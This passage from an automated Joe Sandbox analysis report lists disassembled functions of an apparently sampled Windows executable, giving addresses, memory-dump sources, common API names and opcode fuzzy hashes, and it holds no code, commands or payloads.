                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                                                        • String ID:
                                                                                        • API String ID: 1365068426-0
                                                                                        • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                        • Instruction ID: f2d94dd7eabefc5eff24a85ff078c1fcc797a66c0ca25ee228bc663fa0475863
                                                                                        • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                        • Instruction Fuzzy Hash: F601DA76A0C74282E720DF67A89057AA695BBD9BC0F484034EA9E86B95EF3CE5158700
                                                                                        Function 00007FF6FE1BFCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .
                                                                                        • API String ID: 0-248832578
                                                                                        • Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                        • Instruction ID: 5d8188e9aaa948048afb62462e00fa4d795e6ef426e421ead9f60ba126a3017d
                                                                                        • Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                        • Instruction Fuzzy Hash: 4331C522F1869545EB60DA379C057B96E91ABE8BE4F548235FE6C87BC5EE3CD501C300
                                                                                        Function 00007FF6FE1C5AF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                        • String ID:
                                                                                        • API String ID: 15204871-0
                                                                                        • Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                        • Instruction ID: 628e515ea78b9c1b58244c0d3a9bda36606a2221e400967efc609708defcf5bb
                                                                                        • Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                        • Instruction Fuzzy Hash: 8CB12973A14B858AEB15CF2EC8463A87BA0F794B48F158931EA6DC77A4DF39D451C700
                                                                                        Function 00007FF6FE1A8DF4 Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                        • String ID:
                                                                                        • API String ID: 1061551593-0
                                                                                        • Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                        • Instruction ID: 01ef692d05cc3525a648c7e3bf016c2b245ce3cce902f5a243bdb8614f496b89
                                                                                        • Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                        • Instruction Fuzzy Hash: F1812A76F08A1586EB20CF6AE4446AD7B71BB94F88F004132EE1D977A4EF78E549C340
                                                                                        Function 00007FF6FE1AA2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                        • String ID:
                                                                                        • API String ID: 2169056816-0
                                                                                        • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                        • Instruction ID: cadbfc35a39954b54b7ce05d604ea44a55bd48ff7bf2fa8f719eb4961680520b
                                                                                        • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                        • Instruction Fuzzy Hash: EA115C36A08B8195E761CF12E4007E97761FFD8B48F844135EA5D83AA8EF3CE149C744
                                                                                        Function 00007FF6FE19126C Relevance: 1.7, APIs: 1, Instructions: 241COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE1924C0: CreateFileW.KERNELBASE ref: 00007FF6FE19259B
                                                                                          • Part of subcall function 00007FF6FE1924C0: GetLastError.KERNEL32 ref: 00007FF6FE1925AE
                                                                                          • Part of subcall function 00007FF6FE1924C0: CreateFileW.KERNEL32 ref: 00007FF6FE19260E
                                                                                          • Part of subcall function 00007FF6FE1924C0: GetLastError.KERNEL32 ref: 00007FF6FE192617
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE1915D0
                                                                                          • Part of subcall function 00007FF6FE193980: MoveFileW.KERNEL32 ref: 00007FF6FE1939BD
                                                                                          • Part of subcall function 00007FF6FE193980: MoveFileW.KERNEL32 ref: 00007FF6FE193A34
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 34527147-0
                                                                                        • Opcode ID: 1488c1936801c91a2cee98249e7db5a0996b073c688c31523c97a3bef9f1bd63
                                                                                        • Instruction ID: 0e09924f4b52e989a3697c0115fb80c6a3a8be45a5d00fc0827f8b267108c812
                                                                                        • Opcode Fuzzy Hash: 1488c1936801c91a2cee98249e7db5a0996b073c688c31523c97a3bef9f1bd63
                                                                                        • Instruction Fuzzy Hash: 68918B62F18A4682EB10DB67E4442AE6B61FBE5BC4F414032FE1D97BD9EE38D585C340
                                                                                        Function 00007FF6FE194EB0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version
                                                                                        • String ID:
                                                                                        • API String ID: 1889659487-0
                                                                                        • Opcode ID: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
                                                                                        • Instruction ID: ee79a550b97e72e01bfe593605bf10280620ffee6da4cdbc85f45a0636bc3fd9
                                                                                        • Opcode Fuzzy Hash: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
                                                                                        • Instruction Fuzzy Hash: 1F017C71D4D98389FB31CB26A4943F92B91ABF9306F440134F5BD866D5EE2CB098CA04
                                                                                        Function 00007FF6FE1B8C1C Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: 0
                                                                                        • API String ID: 3215553584-4108050209
                                                                                        • Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                        • Instruction ID: 4418f5b94f595c7ed4b395c7fe0f994b2d7be5e84075015c7eeb8560109d99b9
                                                                                        • Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                        • Instruction Fuzzy Hash: 9181D321E2824286EBA8CA2780806BD6A91EFF1F44F541536FD29D77D5EF3DE846C740
                                                                                        Function 00007FF6FE1B89A0 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: 0
                                                                                        • API String ID: 3215553584-4108050209
                                                                                        • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                        • Instruction ID: 1e37667efa94a1a4bc0f071dfa94c4fc1f6160e860c44939440db72ecb151f94
                                                                                        • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                        • Instruction Fuzzy Hash: FC71E561E0C28246EBA8CA3B81402BD6F90AFE1F44F141935FD29D77D6EF2DE8468741
                                                                                        Function 00007FF6FE19C96C Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: gj
                                                                                        • API String ID: 0-4203073231
                                                                                        • Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                        • Instruction ID: 6c39bd0cac1b9f721bdfe749d4b368cd4061e1658d733742cc5ead6a080ae246
                                                                                        • Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                        • Instruction Fuzzy Hash: 1D51B137B286908BD724CF26E40099E77A5F388758F045126FF9A83B48DB39E945CF40
                                                                                        Function 00007FF6FE1BC838 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                        • Instruction ID: dcd83db7fd2c3d85b3bda897f47599bd5cbb085792436433b4d7ba959fd43cc6
                                                                                        • Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                        • Instruction Fuzzy Hash: 1241C022B14A4586EF08CF2BD4142A977A6B7A8FD0B499036EE2EC7794EE3CD041C300
                                                                                        Function 00007FF6FE1C0D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapProcess
                                                                                        • String ID:
                                                                                        • API String ID: 54951025-0
                                                                                        • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                        • Instruction ID: 01923c81e9f7d864f44aed0f145e3ddf2ae34dce080abc101ee923c3d38dff35
                                                                                        • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                        • Instruction Fuzzy Hash: 98B09224F17E02C2EB08AB166C8229426A4BFA8B00F94A078E11CC1360EE3C30AA4B00
                                                                                        Function 00007FF6FE1A3964 Relevance: .9, Instructions: 931COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
                                                                                        • Instruction ID: 567a8cccf76c4670024149d0b4765f1e3649c35b6571199964513c550561e62b
                                                                                        • Opcode Fuzzy Hash: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
                                                                                        • Instruction Fuzzy Hash: A482E5A2E496C186D715CF26D4442BC7F61E7A5F84F19813AEA6E873C5EE3CD849C310
                                                                                        Function 00007FF6FE1876C0 Relevance: .9, Instructions: 893COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                        • Instruction ID: 505aa6deba3dbf66c595b0aff7ab16a8dcacf0f63054b350009235a1d4f6c582
                                                                                        • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                        • Instruction Fuzzy Hash: 72628D9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                                                        Function 00007FF6FE1A53F0 Relevance: .9, Instructions: 891COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
                                                                                        • Instruction ID: f2748e8075d2b26b06b70d8de143343c0069ec2197585a795d037f2f98cfec09
                                                                                        • Opcode Fuzzy Hash: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
                                                                                        • Instruction Fuzzy Hash: 7482F1B3E096C18AD725CE29D4446FC7B61F7A6F48F088136DA6D87789EE3C9489C710
                                                                                        Function 00007FF6FE19BB90 Relevance: .6, Instructions: 587COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                        • Instruction ID: d2387d782abcd6d828d6c4d60e241f382c66243435dca91ca986e0a7669a54e8
                                                                                        • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                        • Instruction Fuzzy Hash: 6D22E473B246508BD728CF25C89AE5E3766F798744B4B8228DF0ACB789DB38D505CB40
                                                                                        Function 00007FF6FE1A4B98 Relevance: .6, Instructions: 578COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
